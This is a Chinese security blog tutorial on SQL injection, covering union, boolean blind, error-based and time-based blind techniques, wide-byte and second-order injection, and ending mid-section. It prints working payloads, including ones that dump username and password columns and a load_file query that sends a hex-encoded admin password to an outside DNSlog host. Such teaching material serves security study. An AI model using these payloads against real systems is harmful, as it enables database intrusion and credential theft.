                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/IIS/iis/">IIS</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Joomla
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/Joomla/joomla/">Joomla</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Nginx
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/Nginx/nginx/">Nginx</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Seeyon-OA(致远)
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/Seeyon-OA(%E8%87%B4%E8%BF%9C)/seeyon-oa/">Seeyon-OA(致远)</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Spring
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/Spring/spring/">Spring</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            ThinkCMF
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/ThinkCMF/thinkcmf/">ThinkCMF</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            ThinkPHP
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/ThinkPHP/thinkphp/">Apache-Log4j</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Tongda-OA(通达)
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/Tongda-OA(%E9%80%9A%E8%BE%BE)/tongda-oa/">Tongda-OA(通达)</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Weaver-Ecology-OA(泛微)
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/Weaver-Ecology-OA(%E6%B3%9B%E5%BE%AE)/weaver-oa/">Weaver-Ecology-OA(泛微)</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Weblogic
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/Weblogic/weblogic/">Weblogic</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Wordpress
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/Wordpress/wordpress/">Wordpress</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Zabbix
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/Zabbix/zabbix/">Zabbix</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Zentao(禅道)
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/Zentao(%E7%A6%85%E9%81%93)/zentao/">Zentao(禅道)</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            phpMyAdmin
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/phpMyAdmin/phpmyadmin/">phpMyAdmin</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            编辑器上传漏洞
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/12/14/%E3%80%904%E3%80%91%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/%E7%BC%96%E8%BE%91%E5%99%A8%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/edit-upload/">编辑器上传漏洞</a></li>  </ul> 
                    </li> 
                     </ul> 
                    </li> 
                     </ul> 
    </div>
    <script>
        $(document).ready(function() {
            var iconFolderOpenClass  = 'fa-folder-open';
            var iconFolderCloseClass = 'fa-folder';
            var iconAllExpandClass = 'fa-angle-double-down';
            var iconAllPackClass = 'fa-angle-double-up';
            // Handle directory-tree expansion:
            // 左键单独展开目录
            $(document).on('click', '#categories a[data-role="directory"]', function (event) {
                event.preventDefault();

                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconFolderOpenClass);
                var subtree = $(this).siblings('ul');
                icon.removeClass(iconFolderOpenClass).removeClass(iconFolderCloseClass);
                if (expanded) {
                    if (typeof subtree != 'undefined') {
                        subtree.slideUp({ duration: 100 });
                    }
                    icon.addClass(iconFolderCloseClass);
                } else {
                    if (typeof subtree != 'undefined') {
                        subtree.slideDown({ duration: 100 });
                    }
                    icon.addClass(iconFolderOpenClass);
                }
            });
            // 右键展开下属所有目录
            $('#categories a[data-role="directory"]').bind("contextmenu", function(event){
                event.preventDefault();
                
                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconFolderOpenClass);
                var listNode = $(this).siblings('ul');
                var subtrees = $.merge(listNode.find('li ul'), listNode);
                var icons = $.merge(listNode.find('.fa'), icon);
                icons.removeClass(iconFolderOpenClass).removeClass(iconFolderCloseClass);
                if(expanded) {
                    subtrees.slideUp({ duration: 100 });
                    icons.addClass(iconFolderCloseClass);
                } else {
                    subtrees.slideDown({ duration: 100 });
                    icons.addClass(iconFolderOpenClass);
                }
            })
            // 展开关闭所有目录按钮
            $(document).on('click', '#allExpand', function (event) {
                event.preventDefault();
                
                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconAllExpandClass);
                icon.removeClass(iconAllExpandClass).removeClass(iconAllPackClass);
                if(expanded) {
                    $('#sidebar .fa.fa-folder').removeClass('fa-folder').addClass('fa-folder-open')
                    $('#categories li ul').slideDown({ duration: 100 });
                    icon.addClass(iconAllPackClass);
                } else {
                    $('#sidebar .fa.fa-folder-open').removeClass('fa-folder-open').addClass('fa-folder')
                    $('#categories li ul').slideUp({ duration: 100 });
                    icon.addClass(iconAllExpandClass);
                }
            });  
        });
    </script>

    
    <div id="toTop" class="fa fa-angle-up"></div>
</aside>
            
            <section id="main"><article id="post-【1】Web安全/SQL注入漏洞" class="article article-type-post" itemscope itemprop="blogPost">
    <div class="article-inner">
        
        
            <header class="article-header">
                
                    <div class="article-meta">
                        
    <div class="article-category">
    	<i class="fa fa-folder"></i>
        <a class="article-category-link" href="/categories/%E3%80%901%E3%80%91Web%E5%AE%89%E5%85%A8/">【1】Web安全</a>
    </div>

                        
                        
    <div class="article-date">
        <i class="fa fa-calendar"></i>
        <a href="/2020/08/12/%E3%80%901%E3%80%91Web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/">
            <time datetime="2020-08-12T12:09:00.000Z" itemprop="datePublished">2020-08-12</time>
        </a>
    </div>


                        
                            <i class="fa fa-bar-chart"></i>
                            <span id="busuanzi_container_site_pv"><span id="busuanzi_value_page_pv"></span></span>    
                        

                    </div>
                
                
    
        <h1 class="article-title" itemprop="name">
            SQL注入漏洞
        </h1>
    

            </header>
        
        
        <div class="article-entry" itemprop="articleBody">
        
        
            
        
        
            <h1 id="SQL注入漏洞基本原理"><a href="#SQL注入漏洞基本原理" class="headerlink" title="SQL注入漏洞基本原理"></a>SQL注入漏洞基本原理</h1><p>Web应用程序对用户输入的数据校验处理不严或者根本没有校验，致使用户可以拼接执行SQL命令。</p>
<p>可能导致数据泄露或数据破坏，缺乏可审计性，甚至导致完全接管主机。</p>
<p><strong>根据注入技术分类有以下五种：</strong></p>
<blockquote>
<p>布尔型盲注：根据返回页面判断条件真假</p>
<p>时间型盲注：用页面返回时间是否增加判断是否存在注入</p>
<p>基于错误的注入：页面会返回错误信息</p>
<p>联合查询注入：可以使用union的情况下</p>
<p>堆查询注入：可以同时执行多条语句</p>
</blockquote>
<h2 id="防御方法"><a href="#防御方法" class="headerlink" title="防御方法"></a>防御方法</h2><p>使用参数化查询。</p>
<p>数据库服务器不会把参数的内容当作<code>SQL</code>指令的一部分来拼接执行；</p>
<p>而是在数据库完成<code>SQL</code>指令的编译后才套用参数运行(预编译)。</p>
<p>避免数据变成代码被执行，时刻分清代码和数据的界限。</p>
<h1 id="MySQL基础知识"><a href="#MySQL基础知识" class="headerlink" title="MySQL基础知识"></a>MySQL基础知识</h1><blockquote>
<p><strong>MySQL默认的数据库有</strong></p>
<p>sys、mysql、performance_schema、information_schema；</p>
</blockquote>
<p><strong>information_schema存放着所有的数据库信息(5.0版本以上才有这个库)</strong></p>
<p>这个库有三个表：</p>
<blockquote>
<ul>
<li><strong>SCHEMATA</strong>    该表存放用户创建的所有数据库库名<ul>
<li><strong>SCHEMA_NAME 字段</strong>记录数据库库名</li>
</ul>
</li>
<li><strong>TABLES</strong>     该表存放用户创建的所有数据库库名和表名<ul>
<li><strong>TABLE_SCHEMA 字段</strong>记录数据库名</li>
<li><strong>TABLE_NAME 字段</strong>记录表名</li>
</ul>
</li>
<li><strong>COLUMNS</strong>     该表存放用户创建的所有数据库库名、表名和字段名<ul>
<li><strong>TABLE_SCHEMA 字段</strong>记录数据库名</li>
<li><strong>TABLE_NAME 字段</strong>记录表名</li>
<li><strong>COLUMN_NAME 字段</strong>记录字段名</li>
</ul>
</li>
</ul>
</blockquote>
<h1 id="查找SQL注入漏洞"><a href="#查找SQL注入漏洞" class="headerlink" title="查找SQL注入漏洞"></a>查找SQL注入漏洞</h1><h2 id="Union注入"><a href="#Union注入" class="headerlink" title="Union注入"></a>Union注入</h2><p>以MySQL注入为例</p>
<p><strong>1、在参数后添加引号尝试报错，并用<code>and 1=1#</code>和<code>and 1=2#</code>测试报错</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id=1' and 1=1<span class="comment">#		页面返回正常</span></span><br><span class="line">?id=1' and 1=2<span class="comment">#		页面返回不正常</span></span><br></pre></td></tr></table></figure>

<p><strong>2、利用<code>order by</code>猜测字段</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id=1%27%20order%0aby%0c2%23	<span class="comment">--返回正常</span></span><br><span class="line"><span class="comment">--上边用%0a和%0c的URL编码可以代替空格，到数据库后就是空格的意思</span></span><br><span class="line">?id=1%27 order by 3<span class="comment">#			--返回正常</span></span><br><span class="line">?id=1%27 order by 4<span class="comment">#			--返回正常</span></span><br><span class="line">?id=1%27 order by 5<span class="comment">#			--返回错误</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--这就证明字段总数为4</span></span><br></pre></td></tr></table></figure>

<p><strong>3、利用union联合查询</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id=-1%27 union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span><span class="comment">#		--看哪个字段可以显示信息，利用它获取数据库信息</span></span><br><span class="line"><span class="comment">--修改id为一个不存在的id，强行报错</span></span><br><span class="line"><span class="comment">--因为代码默认只返回第一条结果，不会返回 union select 的结果</span></span><br></pre></td></tr></table></figure>

<p><strong>4、获取数据库信息</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">id=-1%27 union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="keyword">CONCAT_WS</span>(<span class="built_in">CHAR</span>(<span class="number">32</span>,<span class="number">58</span>,<span class="number">32</span>),<span class="keyword">user</span>(),<span class="keyword">database</span>(),<span class="keyword">version</span>())<span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">user</span>()		<span class="comment">--获取数据库用户名</span></span><br><span class="line"><span class="keyword">database</span>()	<span class="comment">--获取数据库名</span></span><br><span class="line"><span class="keyword">version</span>()	<span class="comment">--获取数据库版本信息</span></span><br><span class="line"><span class="keyword">concat_ws</span>(separator,str1,str2,...)	<span class="comment">--含有分隔符地连接字符串 </span></span><br><span class="line"><span class="comment">--里边这的separator分隔符，用 char() 函数把 空格:空格 的ASCII码输出</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--其它信息</span></span><br><span class="line">@@datadir				<span class="comment">--数据库路径</span></span><br><span class="line">@@version_compile_os	<span class="comment">--操作系统版本</span></span><br></pre></td></tr></table></figure>

<p><strong>5、查询数据库的表</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">id=-1%27 union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'sqli'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span><span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--table_schema=数据库名16进制或者用单引号括起来</span></span><br><span class="line"><span class="comment">--改变limit 0,1中前一个参数，得到所有表</span></span><br></pre></td></tr></table></figure>

<p><strong>6、查询数据库字段</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">id=-1%27 union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=%<span class="number">27</span>数据库名%<span class="number">27</span> <span class="keyword">and</span> table_name=%<span class="number">27</span>表名%<span class="number">27</span><span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span><span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p><strong>7、脱裤，获取数据</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="keyword">group_concat</span>(<span class="keyword">name</span>,<span class="keyword">password</span>)%<span class="number">20</span><span class="keyword">from</span>%<span class="number">20</span>sc<span class="comment">#</span></span><br><span class="line"><span class="comment">--用字段名从表中取数据</span></span><br><span class="line"><span class="keyword">group_concat</span>(str1,str2,...)	<span class="comment">--连接一个组的所有字符串</span></span><br></pre></td></tr></table></figure>

<h2 id="Boolean注入"><a href="#Boolean注入" class="headerlink" title="Boolean注入"></a>Boolean注入</h2><p>布尔型盲注，页面不返回查询信息的数据，只能通过页面返回信息的真假条件判断是否存在注入。</p>
<p><strong>1、在参数后添加引号尝试报错，并用<code>and 1=1#</code>和<code>and 1=2#</code>测试报错</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id=1' and 1=1<span class="comment">#		页面返回正常</span></span><br><span class="line">?id=1' and 1=2<span class="comment">#		页面返回不正常</span></span><br></pre></td></tr></table></figure>

<p><strong>2、判断数据库名的长度</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">1'and length(database())&gt;=1--+		页面返回正常</span><br><span class="line">1'and length(database())&gt;=13--+		页面返回正常</span><br><span class="line">1'and length(database())&gt;=14--+		页面返回错误</span><br><span class="line"></span><br><span class="line">由此判断得到数据库名的长度是13个字符</span><br></pre></td></tr></table></figure>

<p><strong>3、猜解数据库名</strong></p>
<p>使用逐字符判断的方式获取数据库名；</p>
<p>数据库名的范围一般在a<del>z、0</del>9之内，可能还会有特殊字符 “_”、”-“ 等，这里的字母不区分大小写。</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">' and substr(database(),1,1)='a'<span class="comment">--+</span></span><br><span class="line">' and substr(database(),2,1)='a'<span class="comment">--+</span></span><br><span class="line"></span><br><span class="line">substr 的用法和 limit 有区别，limit从 0 开始排序，这里从 1 开始排序。</span><br></pre></td></tr></table></figure>

<p>用Burp爆破字母a的位置，即可得到数据库名每个位置上的字符。</p>
<p><strong>还可以用ASCII码查询</strong></p>
<p>a 的ASCII码是97，在MySQL中使用ord函数转换ASCII，所以逐字符判断语句可改为：</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">' and ord(substr(database(),1,1))=97<span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>ASCII码表中可显示字符的范围是：0~127</p>
<p><strong>4、判断数据库表名</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">' and substr((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'数据库名'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)=<span class="string">'a'</span><span class="comment">--+</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--修改1,1前边的1~20，逐字符猜解出第一个表的名</span></span><br><span class="line"><span class="comment">--修改limit的0,1前边的0~20，逐个猜解每个表</span></span><br></pre></td></tr></table></figure>

<p><strong>5、判断数据库字段名</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">' and substr((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="string">'数据库名'</span> <span class="keyword">and</span> table_name=<span class="string">'表名'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)=<span class="string">'a'</span><span class="comment">--+</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--修改1,1前边的1~20，逐字符猜解出第一个字段的名</span></span><br><span class="line"><span class="comment">--修改limit的0,1前边的0~20，逐个猜解每个字段</span></span><br></pre></td></tr></table></figure>

<p><strong>6、取数据</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">' and substr((<span class="keyword">select</span> 字段名 <span class="keyword">from</span> 表名 <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)=<span class="string">'a'</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>当然如果嫌用Burp慢的话，可以自己编写脚本，修改payload就行了</p>
<p>一般盲注的话都是自己写脚本比较快。</p>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><p>在SQL注入攻击过程中，服务器开启了错误回显，页面会返回错误信息，利用报错函数获取数据库数据。</p>
<p>常用的MySQL报错函数</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="comment">--xpath语法错误</span></span><br><span class="line">extractvalue()	<span class="comment">--查询节点内容</span></span><br><span class="line">updatexml()		<span class="comment">--修改查询到的内容</span></span><br><span class="line">它们的第二个参数都要求是符合xpath语法的字符串</span><br><span class="line">如果不满足要求则会报错，并且将查询结果放在报错信息里</span><br><span class="line"></span><br><span class="line"><span class="comment">--主键重复（duplicate entry）</span></span><br><span class="line">floor()			<span class="comment">--返回小于等于该值的最大整数</span></span><br><span class="line">只要是count，rand()，group by 三个连用就会造成这种主键重复报错</span><br></pre></td></tr></table></figure>

<p><strong>1、尝试用单引号报错</strong></p>
<p><strong>2、获取数据库名</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">' and updatexml(1,concat(0x7e,(<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">0x7e</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">--0x7e是"~"符号的16进制，在这作为分隔符</span></span><br></pre></td></tr></table></figure>

<p><strong>3、获取表名</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">' and updatexml(1,concat(0x7e,(<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'数据库名'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x7e</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p><strong>4、获取字段名</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">' and updatexml(1,concat(0x7e,(<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="string">'数据库名'</span> <span class="keyword">and</span> table_name=<span class="string">'表名'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x7e</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p><strong>5、取数据</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">' and updatexml(1,concat(0x7e,(<span class="keyword">select</span> <span class="keyword">concat</span>(username,<span class="number">0x3a</span>,<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x7e</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>其它函数payload语法：</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="comment">--extractvalue</span></span><br><span class="line">' and extractvalue(1,concat(0x7e,(<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">0x7e</span>))<span class="comment">--+</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--floor()</span></span><br><span class="line"><span class="string">' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+</span></span><br></pre></td></tr></table></figure>



<h2 id="时间型盲注"><a href="#时间型盲注" class="headerlink" title="时间型盲注"></a>时间型盲注</h2><p>盲注是在SQL注入攻击过程中，服务器关闭了错误回显，单纯通过服务器返回内容的变化来判断是否存在SQL注入的方式 。</p>
<p>可以用benchmark，sleep等造成延时效果的函数。</p>
<p>如果benkchmark和sleep关键字被过滤了，可以让两个非常大的数据表做<a href="https://blog.csdn.net/qq_32763643/article/details/79187931" target="_blank" rel="noopener">笛卡尔积</a>产生大量的计算从而产生时间延迟；</p>
<p>或者利用复杂的正则表达式去匹配一个超长字符串来产生时间延迟。</p>
<p><strong>1、利用sleep判断数据库名长度</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">' and sleep(5) and 1=1<span class="comment">--+	页面返回不正常，延时5秒</span></span><br><span class="line">' and sleep(5) and 1=2<span class="comment">--+	页面返回不正常，不延时</span></span><br><span class="line"></span><br><span class="line">and if(length(database())&gt;1,sleep(5),1)</span><br><span class="line"><span class="comment">--if(条件表达式，真，假) --C语言的三目运算符类似</span></span><br></pre></td></tr></table></figure>

<p><strong>2、获取数据库名</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">and if(substr(database(),1,1)='a',sleep(5),1)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>具体数据以此类推即可。</p>
<h3 id="时间型盲注的加速方式"><a href="#时间型盲注的加速方式" class="headerlink" title="时间型盲注的加速方式"></a>时间型盲注的加速方式</h3><p><strong>1、Windows平台上的Mysql可以用DNSlog加速注入</strong></p>
<p><strong>2、利用二分查找法</strong></p>
<p>sqlmap盲注默认采用的是二分查找法 </p>
<blockquote>
<ul>
<li>利用 ASCII 码作为条件来查询，ASCII 码中字母范围在65~122之间</li>
<li>以这个范围的中间数为条件，判断payload中传入的 ASCII 码是否大于这个中间数</li>
<li>如果大于，就往中间数<del>122这块查找。反之亦然</del> </li>
</ul>
</blockquote>
<h1 id="注入技巧"><a href="#注入技巧" class="headerlink" title="注入技巧"></a>注入技巧</h1><h2 id="DNSlog盲注详解"><a href="#DNSlog盲注详解" class="headerlink" title="DNSlog盲注详解"></a>DNSlog盲注详解</h2><p>DNS在解析的时候会留下日志，通过读取多级域名的解析日志，获取请求信息；</p>
<p>DNSlog就是记录用户访问网站域名时，记录<code>DNS</code>和对应的IP的转换访问日志；</p>
<p>MySQL Load_File()函数可以发起请求，使用Dnslog接收请求，获取数据；</p>
<p>通过SQL执行后，将内容输出到DNSlog中记录起来，然后我们可以在DNSlog平台查询回显数据</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="keyword">load_file</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">hex</span>(pass) <span class="keyword">FROM</span> <span class="keyword">user</span> <span class="keyword">WHERE</span> <span class="keyword">name</span>=<span class="string">'admin'</span> <span class="keyword">LIMIT</span> <span class="number">1</span>),<span class="string">'.mysql.wintrysec.ceye.io\abc'</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment">--Hex编码的目的是减少干扰，域名有一定的规范，有些特殊字符不能带入</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>注意：load_file()只能在windows平台上才能发起请求，linux下做dnslog攻击是不行的</p>
<p>因为UNC通用命名规范， \\server\share_name </p>
<p>上边 CONCAT 应该写四个反斜杠 \，因为最后会被转义成两个</p>
<p>因为Linux没有遵守UNC，所以当MySQL处于Linux系统中的时候，是不能使用这种方式外带数据的</p>
</blockquote>
<blockquote>
<p>MySQL数据库配置中要设置secure_file_priv为空,才能完整的去请求DNS</p>
<p>secure-file-priv参数是用来限制 LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的</p>
<ul>
<li>ure_file_priv的值为null ，表示限制mysqld 不允许导入|导出</li>
<li>当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下</li>
<li>当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制</li>
</ul>
</blockquote>
<p>在时间型盲注中用DNSlog加速注入</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">'and if((<span class="keyword">SELECT</span> <span class="keyword">LOAD_FILE</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">hex</span>(<span class="keyword">database</span>())),<span class="string">'.xxx.ceye.io\\abc'</span>))),<span class="keyword">sleep</span>(<span class="number">5</span>),<span class="number">1</span>)%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><a href="https://www.anquanke.com/post/id/98096" target="_blank" rel="noopener">DNSlog在SQL注入中的实战</a></p>
<h2 id="宽字节注入-过滤了单引号"><a href="#宽字节注入-过滤了单引号" class="headerlink" title="宽字节注入(过滤了单引号)"></a>宽字节注入(过滤了单引号)</h2><blockquote>
<p>在数据库中使用了宽字符集(GBK，GB2312等)，除了英文都是一个字符占两字节；</p>
<p>MySQL在使用GBK编码的时候，会认为两个字符为一个汉字(ascii&gt;128才能达到汉字范围)；</p>
<p>在PHP中使用<code>addslashes</code>函数的时候，会对单引号%27进行转义，在前边加一个反斜杠”\”，变成%5c%27;</p>
<p>可以在前边添加%df,形成%df%5c%27，而数据进入数据库中时前边的%df%5c两字节会被当成一个汉字;</p>
<p>%5c被吃掉了，单引号由此逃逸可以用来闭合语句。</p>
</blockquote>
<p>使用PHP函数<code>iconv(&#39;utf-8&#39;,&#39;gbk&#39;,$_GET[&#39;id&#39;])</code>,也可能导致注入产生 </p>
<p><strong>修复建议：</strong></p>
<blockquote>
<p>（1）使用mysqli_set_charset(GBK)指定字符集</p>
<p>（2）使用mysqli_real_escape_string进行转义</p>
</blockquote>
<h2 id="二阶注入"><a href="#二阶注入" class="headerlink" title="二阶注入"></a>二阶注入</h2><blockquote>
<p>当数据首次插入到数据库中时，许多应用程序能够安全处理这些数据；addslashes() 等字符转义函数。</p>
<p>一旦数据存储在数据库中，随后应用程序本身或其它后端进程可能会以危险的方式处理这些数据。</p>
<p>许多这类应用并不像面向因特网的主要应用程序一样安全，却拥有较高权限的数据库账户。</p>
</blockquote>
<p>第一次HTTP请求是精心构造的，为第二次HTTP请求触发漏洞做准备。</p>
<p><a href="https://www.freebuf.com/articles/web/142963.html" target="_blank" rel="noopener">使用Burp和自定义Sqlmap Tamper利用二次注入漏洞</a></p>
<h2 id="中转注入"><a href="#中转注入" class="headerlink" title="中转注入"></a>中转注入</h2><blockquote>
